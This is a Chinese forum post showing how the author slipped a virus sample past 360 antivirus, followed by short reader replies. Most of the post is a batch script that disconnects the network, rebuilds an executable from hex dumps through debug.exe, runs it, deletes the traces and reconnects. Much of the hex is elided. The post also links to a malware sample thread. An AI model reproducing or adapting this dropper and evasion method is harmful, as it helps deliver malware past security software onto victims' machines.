★★★无聊寻思过360,结果过了,,从下载保护开始,到病毒运行,原来我txt上传错了,难怪..

李白vs苏轼

本文内容有危险性包括txt的内容,请大家别轻易尝试,我只提供测试,有事不负责

大家都知道,我从来不想炫耀,也不是为了攻击任何人而发任何贴
只是对这个有点兴趣,无聊的时候就看看罢了,别讽刺我
录像如下:
http://u.115.com/file/aq7t2s3d

原样本
http://bbs.kafan.cn/thread-1049010-1-1.html


接下来我们开始修改,,把这个exe改成bat,由于字数限制,没法发全部,待会尾部附上当然txt里面是附带断网的,昨晚验证断网成功,病毒运行结束自动联网,,今天修复 了没有就不知道了,我不排除加驱会不会拦截,但是这是个很好的思路,,至少在不加驱的情况下,下面这个样本应该是会加驱的,我随意挑选的,加驱的时候默认是允许的

1. ipconfig /release
   
2. Echo e 100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 >>hke0.tmp
   
3. Echo e 110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 >>hke0.tmp
   
4. Echo e 120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>hke0.tmp
   
5. Echo e 130 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 >>hke0.tmp
   
6. Echo e 140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 >>hke0.tmp
   
7. Echo e 150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F >>hke0.tmp
   
8. Echo e 160 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 >>hke0.tmp
   
9. Echo e 170 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 >>hke0.tmp
   
10. Echo e 180 03 D8 C0 1C 47 B9 AE 4F 47 B9 AE 4F 47 B9 AE 4F >>hke0.tmp
    
11. Echo e 190 84 B6 F3 4F 4E B9 AE 4F 47 B9 AF 4F 50 B9 AE 4F >>hke0.tmp
    
12. .
    
13. .
    
14. 省略几十万.
    
15. .
    
16. .
    
17. Echo rcx>>hke0.tmp
    
18. Echo FC00>>hke0.tmp
    
19. Echo n WHS0.tmp>>hke0.tmp
    
20. Echo w>>hke0.tmp
    
21. Echo q>>hke0.tmp
    
22. debug<hke0.tmp>nul
    
23. Echo e 100 BC 01 10 8C D1 40 FF 31 D8 FB 41 BB 97 53 FF 1A >>hke1.tmp
    
24. Echo e 110 81 C9 6B 6E 8A 7C A7 2C 3A 0A 64 2C 21 9B 21 F6 >>hke1.tmp
    
25. Echo e 120 23 F6 02 0F 9A A4 C0 62 BC 8C 0E 5E 4F 21 86 59 >>hke1.tmp
    
26. Echo e 130 08 0A 55 C6 DD 06 11 C5 D6 3E 04 41 DB B6 69 5B >>hke1.tmp
    
27. Echo e 140 55 D3 5E 99 AD AC DC B3 73 43 53 5F 3F DD 50 DF >>hke1.tmp
    
28. Echo e 150 71 6D 07 E4 27 B8 87 9A AE 94 11 83 23 A4 C8 42 >>hke1.tmp
    
29. Echo e 160 95 38 EA C9 21 32 6C 6E C8 BC 71 68 26 D0 F1 ED >>hke1.tmp
    
30. Echo e 170 BE ED 71 2D 04 AC 80 AB 35 0C ED D8 DC 19 4D 9E >>hke1.tmp
    
31. Echo e 180 F3 59 EA 4A 57 00 E4 5E B5 7C D0 10 23 60 F5 BB >>hke1.tmp
    
32. Echo e 190 CD 24 6B F8 86 6A A4 FA DB D9 AF 45 F8 FB 19 E4 >>hke1.tmp
    
33. Echo e 1A0 41 C9 84 DF A7 CD D6 71 36 B0 88 41 B5 B6 3E 2F >>hke1.tmp
    
34. Echo e 1B0 00 DD 8D E4 16 B3 AF 75 E2 8B 3F 05 D5 72 D4 4B >>hke1.tmp
    
35. Echo e 1C0 0B 09 5A F1 4E 45 E4 F7 51 EC F6 20 12 0F FF 0C >>hke1.tmp
    
36. Echo e 1D0 D6 7A 9B E7 20 FB A3 89 D3 20 5D 20 F2 0D 97 EC >>hke1.tmp
    
37. Echo e 1E0 EC C6 9D 7F FA 1A 6F 44 90 81 3D 4F 5E 51 4F 8F >>hke1.tmp
    
38. Echo e 1F0 0A 73 79 AB 87 41 92 4C 79 F6 F9 F8 E8 61 E0 00 >>hke1.tmp
    
39. Echo e 200 61 EC CF 4B A7 4A DA 21 47 73 DF 52 7D 00 D6 E3 >>hke1.tmp
    
40. Echo e 210 60 95 5D 0A 86 86 B9 12 A2 89 62 67 8C F1 8A C2 >>hke1.tmp
    
41. Echo e 220 40 42 BF 79 C1 E1 C6 96 EB 49 C2 21 4B 51 7B 2C >>hke1.tmp
    
42. Echo e 230 82 EF C8 0A AD F6 B2 54 AA 51 47 35 90 0D 4D 4E >>hke1.tmp
    
43. Echo e 240 BF 18 3B 7C B9 93 5B 3A E0 3B 0A 29 6D D1 31 F0 >>hke1.tmp
    
44. Echo e 250 BB 73 63 5F 83 90 1D E6 00 3B A1 BF DF 30 9F 22 >>hke1.tmp
    
45. Echo e 260 4C 6F 44 C8 DB 42 AB 63 51 36 A3 81 18 71 AB 0C >>hke1.tmp
    
46. Echo e 270 62 CE C1 9D 37 25 D5 29 55 AE 61 E5 79 C3 F1 AF >>hke1.tmp
    
47. Echo e 280 B3 45 CA 0B 7B 01 15 FA 8E 9E AB 8C 4F EF 7D CC >>hke1.tmp
    
48. Echo e 290 CD 0F 50 E3 85 8F 0F 9A 4D F6 B0 27 EA 31 CF AF >>hke1.tmp
    
49. Echo e 2A0 C8 EF C4 84 97 3E 98 01 6F 53 D0 18 D3 B8 8D 2D >>hke1.tmp
    
50. Echo e 2B0 44 FD B1 D5 28 2E C2 02 0F 8D 0C 41 F4 5B 49 F3 >>hke1.tmp
    
51. Echo e 2C0 E6 5D 6E A3 04 2F 56 AA 58 EC 34 7E 1C C0 25 C5 >>hke1.tmp
    
52. Echo e 2D0 BD BB 34 29 AE CE 5F AD 2C BE 22 03 4F E3 39 D7 >>hke1.tmp
    
53. Echo e 2E0 99 67 5F 5E B3 B5 E3 91 7F 41 CF 82 8A 4E 13 FF >>hke1.tmp
    
54. Echo e 2F0 7E 6C 11 2B 2D 7A A5 55 6D 0D 86 79 B3 CF 57 23 >>hke1.tmp
    
55. Echo e 300 88 17 6E 4D 56 58 5A 8C 3E 59 62 1A 67 A9 0F 99 >>hke1.tmp
    
56. Echo e 310 48 E7 64 07 06 EB C4 C8 04 E5 A9 19 E0 1E B6 6D >>hke1.tmp
    
57. Echo e 320 9D D7 A3 6E 35 1D A7 FF 64 F1 D5 EC 24 56 32 9F >>hke1.tmp
    
58. Echo e 330 C9 90 4E DE 5D 07 66 DE FC F2 DE C3 97 FC A7 9D >>hke1.tmp
    
59. Echo e 340 2C F7 20 9E EA 92 1A F2 4A E3 DA 78 B6 F6 23 C6 >>hke1.tmp
    
60. Echo e 350 49 EA 9E 85 D6 E2 D4 99 A2 9B 3F FD DA 52 D3 97 >>hke1.tmp
    
61. Echo e 360 87 05 6B 1E C2 B4 CD 86 30 7E 1F 5C AE AD D2 C7 >>hke1.tmp
    
62. Echo e 370 32 1A B8 CB F0 1D 21 7D D7 D5 BC 78 06 2E 1D 38 >>hke1.tmp
    
63. Echo e 380 B6 4F CB 17 7D B4 5A 80 AE FC 3C F5 4E 82 EF E2 >>hke1.tmp
    
64. Echo e 390 62 41 54 72 B0 9F 8C 65 F7 E8 39 E8 95 A5 AC EA >>hke1.tmp
    
65. Echo e 3A0 FF 29 32 E6 58 34 41 FA FE 91 75 EC EE 91 A7 75 >>hke1.tmp
    
66. Echo e 3B0 0C 7D B3 14 46 65 45 40 65 50 CA F8 93 03 2F FD >>hke1.tmp
    
67. Echo e 3C0 A0 4A 61 71 5E F0 DC CB 34 C4 16 F8 9F EC 44 63 >>hke1.tmp
    
68. Echo e 3D0 0C 4E 18 40 B7 EA AE 92 DB 5B C3 77 41 E5 13 C2 >>hke1.tmp
    
69. Echo e 3E0 63 E6 2D 6E CC C3 07 2A 4B 93 38 60 6C 71 06 65 >>hke1.tmp
    
70. Echo e 3F0 A0 80 47 02 E4 83 43 2B B3 CC CA 97 74 88 69 79 >>hke1.tmp
    
71. .
    
72. .
    
73. .
    
74. 省略几十万
    
75. .
    
76. .
    
77. Echo rcx>>hke1.tmp
    
78. Echo FC00>>hke1.tmp
    
79. Echo n WHS1.tmp>>hke1.tmp
    
80. Echo w>>hke1.tmp
    
81. Echo q>>hke1.tmp
    
82. debug<hke1.tmp>nul
    
83. Echo e 100 08 96 74 A8 1A CF 8B 41 68 A9 BB 8C 43 15 49 0F >>hke2.tmp
    
84. Echo e 110 C0 25 96 F0 47 3F B6 BC 5E F0 D3 BF 8B C4 FD 93 >>hke2.tmp
    
85. Echo e 120 9C 8C 33 AD 1E 25 52 D8 FF 4B 72 E6 E9 34 F4 6E >>hke2.tmp
    
86. Echo e 130 DA 8B 1B B9 89 DA AB 94 AD 41 4F 30 82 B4 6D 47 >>hke2.tmp
    
87. Echo e 140 8C FD 10 2E CB C9 DC A3 28 C3 59 DD 02 F9 89 A5 >>hke2.tmp
    
88. Echo e 150 9F 0C 33 B1 41 CC CC 44 BB 2E A4 C0 19 AC 28 CE >>hke2.tmp
    
89. Echo e 160 42 6F E4 04 7C 0A FE 25 EE 35 49 E4 15 92 B4 20 >>hke2.tmp
    
90. Echo e 170 71 E9 A7 3D 15 A2 64 3B 96 5B 24 E0 57 80 DE BE >>hke2.tmp
    
91. Echo e 180 44 FF C2 EE 5B 2A 0A B5 42 E7 AF 19 21 5F 04 5B >>hke2.tmp
    
92. Echo e 190 B8 3A 38 60 E4 9D 10 DC D8 9B 88 E6 67 A0 21 59 >>hke2.tmp
    
93. Echo e 1A0 C9 F3 07 2C 26 E8 C2 9D 93 6D 6F 5F 89 AC 80 83 >>hke2.tmp
    
94. Echo e 1B0 49 FE 7A 9D 34 64 DA AA A0 9E 86 4D C0 DC 73 2F >>hke2.tmp
    
95. Echo e 1C0 AB A5 51 D5 85 CB 72 DD E1 BA 88 1A CB 14 58 F0 >>hke2.tmp
    
96. Echo e 1D0 8F 8D 41 52 80 9C BB 9D A6 78 36 2C 06 35 7C A1 >>hke2.tmp
    
97. Echo e 1E0 14 87 88 F8 28 CC A3 D0 CD 70 2A 13 61 C8 AF F4 >>hke2.tmp
    
98. Echo e 1F0 24 1B F0 63 F4 FA D5 0F EB 51 3A C1 FB B3 D8 67 >>hke2.tmp
    
99. Echo e 200 4A 63 4A A8 DF DC C7 33 0C A8 B1 6E 70 04 24 87 >>hke2.tmp
    
100. Echo e 210 C2 94 B9 D1 D9 25 3E 98 C0 3C 57 32 BB CC 7D A0 >>hke2.tmp
     
101. Echo e 220 BE 60 53 28 2E 85 D9 E0 83 EC BF 11 DE 76 CA C8 >>hke2.tmp
     
102. Echo e 230 03 AF F4 C3 84 96 5C C9 96 E9 1D E3 D3 F5 FA B4 >>hke2.tmp
     
103. Echo e 240 2D 26 D8 73 91 69 7B 84 16 29 96 9B 0A 6F 7C 2E >>hke2.tmp
     
104. Echo e 250 F6 5E 80 B0 F7 36 6E A5 58 9F FB C4 59 10 18 3F >>hke2.tmp
     
105. Echo e 260 92 A8 12 9D 6B 0F EF 23 3A FE C3 F7 90 61 EC 42 >>hke2.tmp
     
106. Echo e 270 45 48 AC 4B BC B0 7B 50 71 D3 6C 78 93 C1 01 5E >>hke2.tmp
     
107. Echo e 280 C7 E6 1D 99 69 96 13 94 C8 6A 7A C9 8A 4D E4 66 >>hke2.tmp
     
108. Echo e 290 B8 E6 E0 6C F5 94 32 C7 B6 FA AA 15 08 22 51 2A >>hke2.tmp
     
109. Echo e 2A0 30 02 2F C8 76 5A 9F 63 8D 2F C6 9C DF 53 46 C4 >>hke2.tmp
     
110. Echo e 2B0 E1 35 93 10 6A 12 82 A9 DE 7E 90 46 F7 69 6E 3C >>hke2.tmp
     
111. Echo e 2C0 C6 85 72 87 84 93 44 09 84 12 58 FF D0 62 B9 29 >>hke2.tmp
     
112. Echo e 2D0 F2 35 AB D7 D9 09 8F 5D EA 77 4F 93 19 3D 03 7A >>hke2.tmp
     
113. Echo e 2E0 99 C2 26 55 10 12 83 CC 76 58 BB F5 A4 58 6E AC >>hke2.tmp
     
114. Echo e 2F0 35 3E 8D C7 5E 53 75 2D 11 73 95 3D 4C EA 28 B3 >>hke2.tmp
     
115. Echo e 300 E4 D2 43 BA 80 45 21 37 97 53 8D ED 8F B6 B0 A2 >>hke2.tmp
     
116. Echo e 310 35 67 61 09 97 AF 41 2D 0D A9 18 69 60 A4 63 5E >>hke2.tmp
     
117. .
     
118. 省略几十万
     
119. .
     
120. Echo rcx>>hke2.tmp
     
121. Echo 6C00>>hke2.tmp
     
122. Echo n WHS2.tmp>>hke2.tmp
     
123. Echo w>>hke2.tmp
     
124. Echo q>>hke2.tmp
     
125. debug<hke2.tmp>nul
     
126. Copy /b /y WHS0.tmp+WHS1.tmp+WHS2.tmp bat.exe
     
127. del hke*.tmp
     
128. del WHS*.tmp
     
129. cls
     
130. bat.exe
     
131. ipconfig /renew
     

复制代码

为了躲避版规,把修改后的结果放在txt里面
txt原来上传错了,上传个新的

把他修改成bat后,运行就会自动断网,生成exe,运行exe,联网
bat下载保护,双击,360卫士都无反应

CBT-BILL

半夜没人
抢沙发
坐等明天

cxwlc2005

沙发没了，前排支持。

止战之殇

前排支持,等结果了

hongjiegg

来看看湿人，明天继续。

dong7010

360系唛？？？？？？？？？

天神DeIty

白天等真相

chongzifei

等真相，支持下李白

xxss

支持李白，等结果

hsezbmh

见证了李白的猥琐的飘过